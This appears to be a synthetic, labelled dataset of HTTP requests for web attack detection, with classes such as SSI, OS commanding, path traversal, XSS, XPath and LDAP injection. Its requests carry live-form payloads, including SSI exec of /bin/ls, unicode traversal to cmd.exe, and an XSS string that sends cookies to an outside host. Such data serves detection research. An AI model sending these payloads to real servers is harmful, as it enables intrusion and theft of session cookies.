Date: Fri, 14 Jan 05 16:18:21 UTC
ETag: W/"I_hTbN8PfB-DiN3.CRnu"
Expect: seoOtore
From: d0eeeh@siwe.fr
If-Modified-Since: Fri, 24 Jul 09 18:18:18 UTC
If-Unmodified-Since: Fri, 12 Jun 09 11:21:44 GMT
If-Match: "bAsTW383JDRa0PgbyVJ"
If-None-Match: "PE_W_hMPwQMqN5X9lxY"
If-Range: Mon, 11 Sep 06 19:44:15 GMT
Max-Forwards: 18
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic bnloYVQ6aXNydGh0eXM=
Authorization: Digest qop=auth
Range: 41-9272,-212,7881-582
Referer: http://www.c4e0ay2c.st/tnEi5/ti4tmt/savit.mp3
TE: deflate;q=0.2,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.9 (Machintosh; U; PPC 9.6; oi-s6; rv:3.7.4) Gecko/01435900
UA-CPU: Sparc
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 116x3462
Via: FTP/3.1 www.epolm.html
Transfer-Encoding: compress
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45626
Start - Id: 40959
class: SSI
POST /i6/mnRgNQgUUJuZczZqiW/tr/1B/_rridzAZ/pvrd/TkB-X.o/dmM8he_8Txeq.shtml? HTTP/1.1
Content-Length: 190
Content-Language: ebn1R8t
Content-Encoding: compress
Content-Location: http://fna6iR.st/rsrinsvQ/hoahor.shtml
Content-MD5: ZUFoZUVyZWFicEE5Z3NoMA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 05 Mar 06 02:14:55 GMT
Host: 130.198.176.183:693
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate;q=0.6
Accept-Language: snab-3lo;q=0.2, 5lte-eoo;q=0.2, yeld8f-hs;q=0.0
Cookie: tPreeenasaoeUO=<!--   #odbc statement=  "select    t6hhrtd,    tc2rtb,  Nrw     from oux7ivnr   order by 9, 171,   7"     -->;texauO9T=|;ehhd=fih3Tilaae;nitiHtH=845;khsrhqQ=661
Date: Sat, 24 Jan 04 23:55:56 CET
ETag: "G1oKLMd.DCRyUoxc-c"
From: gOoS@iiTas1.it
If-Modified-Since: Tue, 26 Jul 05 15:17:17 GMT
If-Unmodified-Since: Sat, 25 Sep 04 02:58:34 GMT
Max-Forwards: 1927
Range: 435-691398,225-
Referer: /rhtiyGt4/Ease.tiff
User-Agent: n9mde (lLUbe8AU; rx0.bw9; aWV_0xj5ZI)
Via: 9.8 78.107.70.81

onazmt=txcjRl5igafnaeAgs&oxqtenEtdarR5uh=37661814&73cgiyoycw=ESaor&ue9atnudE=eiriA\toats3copyor&sweoiya25eoy=Oshutdowndb&aABo4n=Alntef&amdcirrtuetsioe=4&f3eaotPp=5~iZfb&sbnPbwanwrrra=378

End - Id: 40959
Start - Id: 36484
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 141.70.136.161
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=723
Client-ip: 5.230.172.131
Cookie: fttn4ar7aam=smt+>;o1nploqineho=11;e8aserfzOhtcaei=t l1eilikeqoixwe;namhe=00;hsoeorvnkeaEndo=gway9ru;KSrLGO=q
Cookie2: $Version="984"
Date: Wed, 30 Jan 08 09:57:30 GMT
ETag: "EEjfH1qoZefe@m2kmR"
Expect: 100-continue
From: n8us@72HjX.ch
If-Modified-Since: Thu, 15 Feb 07 05:51:15 UTC
If-Unmodified-Since: Tue, 17 Jun 08 13:42:44 GMT
If-Match: "BruOo.VZdGlpVJPoS2Y"
If-None-Match: "WV99r78SvCx-jsQKD"
If-Range: Sun, 29 Apr 07 23:18:13 GMT
Max-Forwards: 23
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: iMny petZeqhm=7afz
Range: 998505-,-0540,815-
Referer: http://onened.net/79ehadHh/hoaVaa/erogm.nsf
TE: gzip;q=0.6,gzip;q=0.6,chunked
Trailer: If-Modified-Since
User-Agent: tn1gNn9afraonooreedh
UA-CPU: Sparc
UA-Disp: 900,140,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1357x6667
Via: 0.1 www.k0idei.gif
Transfer-Encoding: oeEjm
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 5785430371432590
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36484
Start - Id: 45759
class: PathTransversal
GET /8eHrce/etdh4eadlelror1ffsn/in/hsdmg8iieonjpceti/5hrbyeato.jsp?ynlrisn=0a9ds%3Esot%3C4m++y&8itiPincEE=a%3A%5Cautoexec.bat&vbscriptrPmochaoXmochatdVO=%28le&g38wwt=v3naeBe&wu=ldsntdawerIa4n&ttttdflr36ah4=ae1de%7Ef+9n+l4+&eortaasstn69s=udaaaton6nhEp&omsrh6eas=98890 HTTP/1.0
Host: 27.35.124.34
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-15, cp-950;q=0.4, x-mac-arabic, iso-10646-ucs-2;q=0.4
Accept-Encoding: deflate;q=0.7
Accept-Language: *;q=0.2
Cache-Control: sep='rodFesq'
Client-ip: 94.195.108.172
Cookie: topeNaOserega=l]i;i.nw9hs3=Ot'1h;aabsoita=lhdrtettlOityeTi;fi30sa=ixjRqkI;deser=ore
Cookie2: $Version="51"
Date: Mon, 23 Jul 07 20:05:23 GMT
ETag: "NdluKyEsbt3wqR6uNr"
Expect: aameaew
From: euwomb@eMrse.it
If-Modified-Since: Mon, 15 Dec 08 05:25:00 CET
If-Unmodified-Since: Tue, 28 Sep 04 16:40:41 CET
If-Match: "7Iprad7Mc-o95V3"
If-None-Match: *
If-Range: "gJqyo3ohhngxeIbr"
Max-Forwards: 524
MIME-Version: 8.4
Pragma: yireiEs='newnt'
Proxy-Authorization: Basic ZXJsbnQ4OnN6Y2U=
Authorization: Bid3jw ermmy=OefhS
Range: -500252,934-3694
Referer: /nohxmy.sh
TE: gzip;q=0.5,deflate;q=0.0
Trailer: From
User-Agent: Mozilla/6.7 (compatible; cnetcN; Win 9x; tEta; tro7cioNoN; stoofit5dT)
UA-CPU: StrongARM
UA-Disp: 0244,7553,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9810x7556
Via: FTP/1.5 72.252.178.74
Transfer-Encoding: Os6T7i; n0Ia=ddian
Upgrade: wMsS/2.7, cdte/4.8
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 156.175.229.133
X-Serial-Number: 8409681186997
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45759
Start - Id: 40446
class: SSI
GET /17t9t4tmorhr9aatho/e.ZhVaAlISe/h2F8jX/crL/nHiYKxSKmL0-/ozsweNNag0hioiYt/6xouhAwuv5gsf/QOF/snaeoTjoTbkotnt/eiehsIoHroaesy.css?iI3qoOleb=9796&ebANgseaBrpr1bt=UaiSteE9eeuooeT&eftrdidhsonetyl=c%24%5DU&eeMn=+u&2qDmliSr0RoZdrv=1fsa&do4ida=E3je&sbhohot=0+ge%40ril%27eEveq%3CSR&mzN=bNVz9hsCUp&0es3onpoTtoxhe1=94712501&6elEattdonBn=lselectnaau%7Eerer%40%25&jnkdztn0t=kTerbln0uHdenxoe&ouhrftirgk5psmm=77156&U@oy=erKT&ax=%3C%21--++%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E HTTP/1.1
Host: www.pun8sn8.biz:80
Connection: rbTl
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 72.82.95.101
Cookie: ikry71rli=peoma3eEcf4leb
Cookie2: $Version="879"
Date: Fri, 01 Apr 05 24:13:48 CET
ETag: W/"VV0zyI0DX0STgMmQ34h"
Expect: 100-continue
If-Modified-Since: Thu, 11 Dec 08 10:35:25 GMT
If-Unmodified-Since: Wed, 20 Sep 06 05:28:12 CET
If-Match: *
If-None-Match: "Rku@O.tZCM7jQAR"
If-Range: "dRvIvZRddlTCwMD7U"
Max-Forwards: 3
MIME-Version: 3.0
Pragma: atx='wnt5'
Proxy-Authorization: 2eg8q 4ltgtAr9=na5Ilsmg
Authorization: NTLM aW9yaWF4ZTN2UXptdHFobHNhaWZ0YW5hbm5lSWwwZHdyd2NwZg==
Range: 53605-7014
Referer: http://www.adhceki.biz/twadi/napztcen/mifL/Sbqylers.mpg
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.8 (Windows; U; Win 9x 8.9; ix-ss; rv:0.5.4) Gecko/53981502
UA-CPU: 68000
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4401x4707
Via: FTP/2.7 www.mmasts3.js, ieetms/2.7 93.86.91.135, 1.8 www.aSsi.tiff:3
Transfer-Encoding: compress
Upgrade: Fet/1.1, nsHe/6.2
Warning: 037 www.zncew.jpg "u3loce3odp3oeC" 
X-Forwarded-For: 211.36.21.124
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 40446
Start - Id: 39952
class: SSI
GET /NS5ufromEidAmApboot.iniCL/wBt9Qi-0sIc1-.X3I/mail649winnt8qt0RHMs/fWxqdL0Ido0LjaQL.jsp?noatot5eerxt=hhttps%3DperlsbRnhttps&cTRud3doioMtthh=22216388&rnleng4eh7akiwe=994&iFSf80=lynodenOhyt%27uF%3D+sambetweenfu&iTtuiwrmarniho=%3C%21--++++%23exec+++++cmd%3D%22%2Fbin%2Fls+++-l++%2Fhome%2Fstc%2FsRW%22+--%3E&etraerf=tgrntem&tehciegEa=5471&emAhrqirnci=ts-%40W6&2ssEemak=25852&ns8etaleoHwg=807475&0tpOeeu=cn6&gresaween9mgt=938593677 HTTP/1.0
Host: 49.47.196.59:80
Connection: keep-alive
Accept: image/jpeg, audio/*;q=0.3
Accept-Charset: utf-8, utf-7
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 225.57.174.238
Cookie: .Oe@F%uZdV=77caieif
Cookie2: $Version="1"
Date: Sat, 13 Oct 07 12:39:49 GMT
ETag: W/"kT0uPx4hGu-xBjDxNmhh"
Expect: 100-continue
From: uaoalish@aer2rer6.org
If-Modified-Since: Sun, 11 Nov 07 11:09:13 GMT
If-Unmodified-Since: Sat, 12 Feb 05 20:44:59 CET
If-Match: "YC3lM9l2fZPIoXy@"
If-None-Match: "ltBCQCZU3tp1OEhr"
If-Range: Sat, 02 Jan 10 21:32:04 GMT
Max-Forwards: 6
Pragma: ule9='r1nxshEn'
Proxy-Authorization: Digest response="ac4BeDAbEcd7D693f5c14DA2968662dc"
Authorization: 8wet r7glwds=orarogta
Referer: /hwxIhoe/alre9/DanlHo/rdsa/tpssto.txt
TE: gzip,chunked;q=0.1,chunked;q=0.0
Trailer: Connection
User-Agent: Mozilla/7.1 (X11; U; Linux i386 5.5; Cn-Ta; rv:7.7.0) Gecko/40334542
Via: FTP/8.0 www.yeawkaHs.shtml, 5.8 www.zIitmnNa.js
Transfer-Encoding: compress
Upgrade: BEt/7.6, h1sd/6.5, roeKws/7.5, meae/9.7, Tufb6/3.7
Warning: 920 2.33.97.58 "exoEohddhnP0c4dewku" "Sun, 06 Apr 08 17:14:18 CET"
X-Serial-Number: 754321
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39952
Start - Id: 44441
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.olenlEti.net:2
Connection: Sraht7y
Accept: */*
Accept-Charset: koi8-r;q=0.5, iso-2022-jp, iso-8859-7
Accept-Encoding: *
Accept-Language: iXte2Ef-oieeei5, BceeviH-Or;q=0.8, e8dtrntt-e8alit
Cache-Control: max-stale
Client-ip: 169.69.255.164
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="65"
Date: Thu, 07 May 09 05:17:10 CET
ETag: W/"FP76Uf4Vrb4BtBS"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Mon, 22 Mar 04 16:14:03 UTC
If-Unmodified-Since: Tue, 27 Nov 07 24:33:56 CET
If-Match: *
If-None-Match: "@p.dZyTKrVRi7HBOlW3"
If-Range: Mon, 08 Nov 04 08:50:39 UTC
Max-Forwards: 8
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic aWVzODp5ZWh5aQ==
Authorization: Digest response="CD60c21d29faf4F13A7CA0f2F88Cf0FA"
Range: 6-02287,72753-
Referer: /swyhm/e1ihaGfr/pdeida/tfdeeot/nauaii.jsp
TE: trailers,trailers
Trailer: From
User-Agent: 92xMnqCo3O http://www.rRei.org
UA-CPU: Sparc
UA-Disp: 023,120,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 053x237
Via: FTP/0.0 183.56.230.149
Transfer-Encoding: gzip
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 187 191.195.244.181 "inEiyha4iWelEfepe" 
X-Forwarded-For: 187.145.72.149
X-Serial-Number: 45781122630812126119
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44441
Start - Id: 40164
class: SSI
GET /aahtpiub/hqy6FP8/0eeStoddNnorehitGm/n5.Q_-3uMAY/PA5xEV4/6i1Y/vfrom/eOt/yattt2Neg.php3?yrsoan4acer4g=s%40y&tioeI8r3treogb=+er+e+sctr3lstaone&bdter=itiRnulEloh5hynati&iimujenwoBst3n=%3C%21--+++++%23exec+cmd%3D%22%2Fbin%2Fls++++-l++%2Fhome%2Fetrh%2Fhe7W1o%22++++--%3E&thcomisstn=91 HTTP/1.0
Host: 35.182.54.23:80
Connection: ihirraN
Accept: video/mpeg, image/jpeg, application/rtf
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 78.111.15.54
Cookie: xEaiweccdhtl=450;w-dT=c7it;pfzi4dhdroef=aumttc2cmdewimgont;dmsywd= i1;eQietqer=L;usmyea=ssnshutdownpi0hatinrtn
Cookie2: $Version="9"
Date: Sun, 06 Jul 08 19:18:24 GMT
ETag: W/"jd5910xRTiaSO.mE"
Expect: 100-continue
From: stce@ygsk.st
If-Modified-Since: Mon, 03 Aug 09 19:21:58 UTC
If-Unmodified-Since: Mon, 12 Jan 09 09:27:46 CET
If-Match: "AL.F6CMJtkYMIf4LgT"
If-None-Match: *
If-Range: Sat, 26 Jul 08 09:39:19 GMT
Max-Forwards: 122
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM Z3RhdW90YWpuN2NoYWdhZWUwaG1zcmV0ZkFpZWx0cmVkdDV0
Authorization: aaWnni odurc=azctre0
Range: 728-,7-688430
Referer: http://HM6coaer.net/ewmdru/lfTnmoI/Acrnltq/dreyiSq/nr0yeat.png
TE: trailers
Trailer: Warning
User-Agent: Mozilla/7.0 (Machintosh; U; Mac OS X 7.7; ea-sn; rv:7.3.4) Gecko/18485565
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 427x7361
Via: 0.0 20.23.193.181
Transfer-Encoding: compress
Upgrade: w70e/2.8, naoa/9.2, ror/0.7
Warning: 786 183.48.143.31 "bRilMsnty" 
X-Forwarded-For: 165.252.155.117
X-Serial-Number: 014833432
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40164
Start - Id: 48887
class: XPathInjection
GET /sh5BfK9/fohOlie0Waiqs/nb1a/ONRNpk/w9eihtzm9zGewyo/moHS7NcPM/2r7hQscriptjU/uyCC3DkfH_k/VsamKFRLX.sh?ie9z8lje=sscript&Ehor=lUe9Q&j67etljw=58946++or++++A9u%2Fif%2Fmdh8iu%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D93%5D++++or+++++39487%3D&rare7zrsopsra=hailuairze9nn2r&sifdneeOse0P6b=2616&Ol=22794321&yesteewen=cmsae0&tf=emw7kretozdSt&ilta=3&2uawtnt=iiay%24ajea+trnoy+h&GHAy0zexecF=ep1ra1&oE=rdft%2Bcp%28hthyaena&nhmlniiaeeh2r=sdst%7Ceid HTTP/1.1
Host: 200.69.210.44:6
Connection: keep-alive
Accept: audio/x-wav, application/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: mTeee-d3io, ayosfed-aehlm, tdade-xmnyn2, gh4ktnn-t0i, iroce-2o8m
Cache-Control: max-stale=19414
Client-ip: 154.110.51.106
Cookie: ali595UITa5hofP=608837;dns=08465857;5bmbX=oYs
Cookie2: $Version="74"
Date: Fri, 08 Feb 08 14:15:20 UTC
ETag: "yoHUBRdDJNDe7kMqNoJu"
Expect: 100-continue
From: nhrer@c9ndnn.gov
If-Modified-Since: Sat, 05 Apr 08 19:54:32 CET
If-Unmodified-Since: Thu, 12 Jun 08 13:29:51 CET
If-Match: *
If-None-Match: "b5U_PH56mbZCgza1K3bn"
If-Range: Sun, 27 Sep 09 23:27:54 CET
Max-Forwards: 896
MIME-Version: 4.6
Pragma: 3istR=ee8
Proxy-Authorization: dyscrl o8iQnhe=rsca
Authorization: Digest uri=http://eTtMgqe.cz/sLaelaor/t92iw.txt
Range: 2547-43,-89111,-56260
Referer: /rhkitOea/oetoru.dll
TE: trailers
Trailer: User-Agent
User-Agent: 72FodV4H14Awee
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1420x8323
Via: HTTP/0.8 208.148.238.138:05, FTP/3.9 www.sifze.css
Transfer-Encoding: gzip
Upgrade: wagnk/0.9, aebao/4.3, 7ip/5.1, ttd/1.5, iI1eI/9.7
Warning: 766 www.wbdsi.gif "iiitgc4re" "Thu, 08 May 08 03:06:26 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 3294435
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48887
Start - Id: 47695
class: XSS
GET /h.AH_Ms@6ey@pbBQ/rBBErY81nXTZkY.sh?TWj-xvVkT=ndhr&tev3stMroh=wrqose8teuxta3&tx@BYIhformh=h5CZ3qITFpN&9xafromOMA1G=096&leh=%3Ca++href+++%3D%22+++about%3A%3Cs%26%2399%3Bript%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.iestolan.com%2Fcgi-bin%2Fis.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E+++++%22++%3E&nzkfmm7n1=7017826&Eonelcat=697&oo16ed4neqthuoo=mhx&lyp=4384567&nowregyaacrr7t=2dsTlhnnsto37k&hio5ae=36341&tl82m6=287 HTTP/1.0
Host: 124.210.91.122
Connection: lma1cY
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: ns6n2-iU0ds2np;q=0.6
Cache-Control: no-cache
Client-ip: 29.159.169.244
Cookie: 1Ohboot.ini8Xk2=0438;Theun=Ebe hucrc-yoE;4sohio7aclo=q89pi;nigjttg8ehtig=inopen;ii4e=0399;yeNi= av
Cookie2: $Version="58"
Date: Sat, 12 Feb 05 14:02:16 UTC
ETag: W/"3RHIlr@KyXDlBypEK"
Expect: 100-continue
From: ntca1@4fmcsegl.gov
If-Modified-Since: Fri, 27 Nov 09 14:41:42 GMT
If-Unmodified-Since: Mon, 13 Nov 06 17:25:32 GMT
If-Match: "uqUoVYdI.LtswHBPr1w"
If-None-Match: *
If-Range: "a-ZpQlzTiI8L.Fl3"
Max-Forwards: 2
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: sxorov avcea=rose
Authorization: Basic ZXhkU2xlOm4xd2Rjbg==
Range: 57-,235-9884,973-85
Referer: /xtMlmqrt/ol8snbn/otbiond/rtdow.gz
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/8.3 (compatible; MSIE 8.2; Linux i386; 0geueen)
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 934x7117
Via: 2.7 4.71.32.4, HTTP/4.6 119.189.227.71, is4op/9.4 www.igdH.css
Transfer-Encoding: gzip
Upgrade: 4Siht/2.2
Warning: 422 www.tsahzte.tiff "ndnheiEmueo" "Fri, 27 Jan 06 13:37:13 GMT"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47695
Start - Id: 36067
class: PathTransversal
GET /HCls2/51pdivtelnetyD0/uIfEbDIscript/nlgeudHw/l7@OeqDldNo@EPWo.shtml?fpca3trtecs=OyYblkthohnqsarv&fnvyT=847&sIeDmg=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&ref=09193&7aOin1ieeru=heotretTo4rje HTTP/1.1
Host: 53.179.56.116
Connection: close
Accept: */*;q=0.5
Accept-Charset: euc-tw
Accept-Encoding: gzip, deflate, deflate, gzip, gzip;q=0.7
Accept-Language: hrEsN4ty-aNu, aaeqm-ww7sOiod;q=0.9
Cache-Control: Nb=y
Client-ip: 75.78.7.59
Cookie: oordDearbel=2459522
Cookie2: $Version="080"
Date: Fri, 31 Oct 08 01:21:22 GMT
ETag: W/"d2LO2WEqbtZNb2rt"
Expect: rnvmO=lketanLl;bJytee
From: Esva@5c4oorIai.it
If-Modified-Since: Thu, 30 Aug 07 17:41:02 GMT
If-Unmodified-Since: Thu, 05 Nov 09 14:24:01 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 18 Jan 04 05:44:52 UTC
Max-Forwards: 0489
MIME-Version: 1.3
Pragma: VHK=soA
Proxy-Authorization: NTLM dW50b2ppZWE3em1vdEFuYWFVRW1jcmVjaGhkZWFzbmhpaWh0SXc=
Authorization: hitiey Ai5g4Eh9=tsvbr
Range: -31,-3,49859-
Referer: /Teesn/Iae9jaht/4q9LyiD.gz
TE: deflate
Trailer: Warning
User-Agent: ignai4
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 745x4826
Via: FTP/9.6 164.60.22.111:0, HTTP/8.3 150.2.224.144, 7.8 www.naxNc.htm:8073
Transfer-Encoding: gzip
Upgrade: sztad/3.9, y9oto/3.0
Warning: 312 152.156.79.110 "mvw6naexs" "Mon, 19 Sep 05 14:03:29 GMT"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36067
Start - Id: 38035
class: LdapInjection
GET /e5@mz/LqH/taos5ere/vZ94xj9K/efk5ekm0riea0uuT/tteSrr8h/nr.js?3itEbbinnmFyY@=b0zAxO3uqu_&gO1L9@=ibbw%2Bze&obtaesto=ItcE&aanitoegn9gwo=tte&oo8loohrwrrcdml=ahe%29%28%26%28objectClass%3D+++Rny5*%29&rrytsYrp7tmnEan=703553878&ees09fNaetides=mcrHusres+tl+ HTTP/1.1
Host: www.is8fssL.it
Connection: close
Accept: application/*
Accept-Charset: gb2312;q=0.7, iso-8859-15;q=0.1
Accept-Encoding: gzip;q=0.2, identity;q=0.1, gzip, gzip;q=0.8, identity;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 132.58.25.160
Cookie: gbichE70d=+lsE;topiFiahrahda=8mhs;9fws=31178361;vSaperlPbNc-A=ochildkQoetrvbscript
Cookie2: $Version="23"
Date: Sat, 12 Nov 05 15:28:14 CET
ETag: "4A@c64fauOD7zKA-S"
Expect: 100-continue
From: deigiel@Ostrbaef.it
If-Modified-Since: Tue, 15 Sep 09 20:04:22 CET
If-Unmodified-Since: Tue, 13 Oct 09 03:34:09 CET
If-Match: *
If-None-Match: *
If-Range: "kwWSFsoczEiUFRP5kPO0"
Max-Forwards: 6
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM eW9hQm41aGRzYkZwdG9yc3Roc2Ftd3BrYXdySTR4aGFt
Authorization: of2es dbq0td=t9rej
Range: 33-,6951-
Referer: http://www.e5ee.net/uhHnetw.jpeg
TE: trailers,deflate;q=0.1
Trailer: Cache-Control
User-Agent: Mozilla/1.5 (Machintosh; U; PPC 6.3; el-le; rv:8.7.9) Gecko/80259767
UA-CPU: x86
UA-Disp: 879,787,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 427x816
Via: 6.0 www.uh7kui.shtml, 7.3 www.eIfur9u.js, HTTP/5.9 www.u9rd.htm
Transfer-Encoding: compress
Upgrade: ttnx/4.7, Mocaid/6.1, lsgsia/7.3, sekx/3.8
Warning: 684 151.9.243.38 "piufAer70OehrhadSaho" "Sun, 23 Jul 06 03:35:28 UTC"
X-Forwarded-For: 212.17.65.81
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38035
Start - Id: 35555
class: XPathInjection
POST /eclfq3Tfikse/dik/djZqJyOkM-/tWzsDt8kk3J/oTe1gt5whtarot/2uqHX/l7-RA9v6qZd/lb8167oh/cSOF.htm? HTTP/1.0
Content-Length: 207
Content-Language: Skmeooch,8Eefo,1s
Content-Encoding: deflate
Content-Location: http://muots.org/sat4d2a.pl
Content-MD5: RXFpaGVpcjA2b2hlaXNpaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jul 05 20:59:35 GMT
Last-Modified: Thu, 22 Nov 07 05:13:18 GMT
Host: www.h2aoHttamc.be:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-3, cp-932;q=0.1, shift_jis, isiri-3342
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 0.191.150.195
Cookie: Ohna=ehuSja@pey;ur33ltsnAalt=szinhr05fm;bt=z@vqoI;MdYnodeAhftpeval=0nadamo
Cookie2: $Version="447"
Date: Tue, 04 Mar 08 03:30:52 CET
ETag: "-FwfO-oPyhjIc7MMKhL"
Expect: 100-continue
From: 8ty7e@ti3yral5l.de
If-Modified-Since: Tue, 27 Oct 09 13:05:43 UTC
If-Unmodified-Since: Fri, 02 Dec 05 23:20:52 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 05 Sep 04 02:45:40 GMT
Max-Forwards: 053
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: len2te ytHaNuew=yalote
Authorization: NTLM U3ZOYUNzdG5lZnE4d2V5cGZxTmNzbnByYWxlVzZvTWFyNHRvdGhzcw==
Range: 1158-964,-612192
Referer: /eEnu3urt.mdb
TE: deflate;q=0.5,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/2.0 (Windows; U; Win 9x 1.5; dj-u6; rv:1.2.4) Gecko/09601012
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-OS: Windows 98
UA-Pixels: 174x8533
Via: 9.4 1.19.245.236
Transfer-Encoding: gzip
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 386 www.coulTvem.jpg "rTen" "Wed, 07 Jul 04 02:45:36 UTC"
X-Forwarded-For: 110.77.12.7
X-Serial-Number: 42337082181389056
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hnnhax=cS&iitite=t&tLe=19816    or  count(path/child::node()[position()=((i+j+k+l+1)]  | path/child::*()[position()=(k+1)])=1  or   4524=

End - Id: 35555
Start - Id: 37901
class: LdapInjection
GET /2opzvdxqY-3x-/vbscriptaXJjAyVlog6krEBG/d50eeo/1ah2aglhEymnas/o7UhnucoI1h/gahbeMeref/ietnT1s0yfsr/i9/bvOJ.M4Vu/w0n/tniwy6ls.shtml?osts=hr%25MrkElsis&Otnd=%29%28++++%7C+++%28hretf%3DhedAs*%29&eehrge7hnm=h&tirSloiWneei=rfluIP&Onvbscripts@uZuGVV=l46iMNTmRkcp&saa=moanwegibH&aAwtetua=iht&ehlxistw=pb&eefreiI=iehNu&8kroe=rFduWB4cO HTTP/1.0
Host: www.hqhaaaaNot.de
Connection: r0ft
Accept: video/*, text/*, text/*
Accept-Charset: iso-8859-8-i;q=0.8, windows-1253, shift_jis
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 201.60.207.156
Cookie: eeitcyn7=eXiH
Cookie2: $Version="1"
Date: Fri, 23 Apr 10 15:35:48 CET
ETag: W/"k_eK26HPsis_XTtOs"
Expect: rtuj9fsi=tnild
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Fri, 04 Feb 05 05:47:15 CET
If-Unmodified-Since: Mon, 08 Nov 04 22:17:32 GMT
If-Match: *
If-None-Match: "KPyQYS3ZDOJzjYnPKR"
If-Range: "RMgMI-CTfjQkK3iPH"
Max-Forwards: 187
MIME-Version: 1.5
Pragma: hthneo='r'
Proxy-Authorization: Digest realm
Authorization: viol wsolm=aeyhuO
